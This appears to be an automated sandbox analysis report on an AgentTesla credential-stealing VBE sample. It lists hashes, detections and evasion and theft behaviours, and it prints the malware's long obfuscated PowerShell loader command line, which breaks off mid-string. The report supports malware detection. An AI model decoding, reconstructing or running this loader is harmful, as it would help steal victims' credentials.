Edit tour
Windows
Analysis Report
prodotto elencato.vbe
Overview
General Information
| Sample Name: | prodotto elencato.vbe |
| Analysis ID: | 800234 |
| MD5: | d633e6aae75a585ac42c5c16b87d05ab |
| SHA1: | 4f0200dd0ed8f5bbb62fa520adae16f5111fdcfc |
| SHA256: | 198739ebfd17248a2e1e14a7da4f13cd3344d7d81eaef628e61e2a171e90280c |
| Tags: | vbe |
| Infos: |  |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
wscript.exe (PID: 5324 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\prodo tto elenca to.vbe" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) 
cmd.exe (PID: 6124 cmdline: cmd /c ech o rshell MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5232 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 5168 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Flymekani = """FoFp iuRenNecPu tAliUnoDin Pr KoHGlTP oBSe ma{Rh Ud Pr An UdpbaaKarM uaOumCy(cl [OrSGitmir StiStnRegA s]Pu`$abPd kaVenFosTo rStiTinBlg ovsPl)Ve;R a Br`$ThvI neLlrThtKh eFo Kn=Kl Re'Sm'Fa;u n FoWktrUd iFotEfeRb- PaHVeoAmsS ltFa Fl`$G gvmeePrrOp tAveop;La AfWmorMaiy dtIneri-om HVioUnsDrt Pr Sn`$Ovv UneThrSptV aeBe;In Af WStrIriNot KeeTr-EkHL aobesFrtGa Fr`$AmvUn eHorBrtPoe Ko;Pa Lo S p de St`$R ePMorUniEn nSatlieTir De Po=St Z oNTeeFewPu -SmOCibPrj rieUdcChtV a HobScyAk tDaeSt[Pa] Ou di(Gr`$ NePFaaSinB asGerdeiKr nChgWasTe. SkLZeeReng rgFetFohOu Co/Fa Gu2 Ti)Fr;Rh F u En ba Fl FDgoInrSk( Un`$ViTSmi DelStkraaV e=Ex0Kl;Bl ze`$CoTFe iRvlRakHea ne pe-Chlv etHj Vg`$F oPUnaHanPr svorunivin LigClsVr.B lLQueCrnSt gUntOrhBa; Ri Be`$ErT OuiGalMokF laAl+fr=Gl 2Si)Pr{af Sy Po Pr R i Di Et Me Ta`$GaPFo rMaiAsnImt PleLirFi[R e`$TaTHyiS tlGekEnaAn /by2ov]Sc Ca=Ir Ho[G dcUnoTonVi vFjeBorLyt re]Te:re:M aTAfotaBFa ySttPoeSa( Tr`$TaPDra AfnEasHerC oiKlnGigMa sMo.RaSCou LdbTesSttB arFaiCanli gDy(Be`$Br TMeiGolBak SiaKn,Ni P e2Lo)St,Ur Ba1Te6Vi) Re;Ha So U s`$SkPRarT riDonAltWi eUtrHa[Af` $CiTHuiTil LikAdaRe/p r2Ly]Op St =Ne Ga(Or` $SmPBlrPii innTitCoeP erKo[be`$S nTLaiHylUn kubaPu/Ba2 tr]Ke Ge-S sbdoxskoSa ral Ru1Un8 Pa5Ha)Ho;K a Kh Ri In Ob}ov Tr[ KnSFotMers uiRvnUngHy ]em[FiSIny fosPhtFieJ umni.TaTSa eVoxIntXe. klEPrnStcD yoVedafiFr nOvgSl]Ph: im:FrACoSN aCFrIPlIRo .SuGUneCht InSSitCorO siHjnCogMo (ke`$BePUn rHoiFanggt SveDirFi)E f;Be}Cs`$B aSSsaPerDa oOvtSuhLi0 di=AjHmaTU dBSn ss'hj EHyADiCAs0 WiCJoAsaCP oDInDpiCCi DHe4Ou9Gu7 FrDShDReDL y5UnDTr5Sk 'Pr;Pr`$Ka SGoaMurAfo MatCuhTh1D o=MyHHyToo BMe Pe'RhF Mo4NeDfl0M aDstAThCDi BSuDki6paC laAStDPr6V aDFrFUnCMy DCl9Ne7noE piEUnDpe0F aDFi7Mi8He ALe8ReBAf9 sc7PuEStCC lDTi7niCSl AStDNo8UnD BaFPrDSpCD eFPa7PrDEj 8UnCdkDGaD Un0brCReFH yDHoCUnFGo 4AtDOpCFeC RaDAuDHo1T rDAv6StDHo DKaCmuALd' Pa;Re`$OsS tiaUnrCloF otOuhDi2Vi =CoHSyTMeB He Pr'PrFL eEEkDFoCEl CEpDDaEVi9 MaCDkBCyDM e6NoDBlAMa FFr8EnDViD FoDReDCyCU nBMuDWiCGa CAlASaCPeA Ta'Fo;je`$ CoSWaaRbrD ioIntErhsk 3kl=FrHSuT DiBCf Ba'I nEAvAMiCTe 0AnCVeAFoC UnDUnDsuCB uDCi4St9La 7PeEHiBHoC foCSaDMy7O fCYoDaaDpr 0SpDIn4AeD MiCBr9To7F oFsu0BlDCh 7FaCSkDCaD phCUnCVrBT oDRe6beCOp 9DaETaAEiD FrCDuCfrBU tCSaFStDSl 0StDUnAToD FlCAaCFoAB a9Fo7MeFTi 1ekDTr8FeD Aa7TiDStDP sDTr5ReDro CFeERhBDaD AcCLyDInFF i'Sp;pr`$L eSEuaSarIs oRotLxhBa4 So=NoHPeTD iBha Un'Ek CGaANoCJeD GeCShBSuDK r0RaDEu7Ru DBrECa'Ge; ud`$ReSDia InrChoMutP yhSu5De=Re HBjTPoBRa St'SuFwoET jDCaCdaCPr DSuFce4FrD Re6TrDAmDO pCBoCStDAn 5MiDReCTyF Ch1BuDSq8C oDPr7HvDIn DUnDPs5DiD NoCBi'Sq;S t`$reSSpar erLeoAstDi hKo6Ca=HuH NeTDiBVe S k'FoEStBAk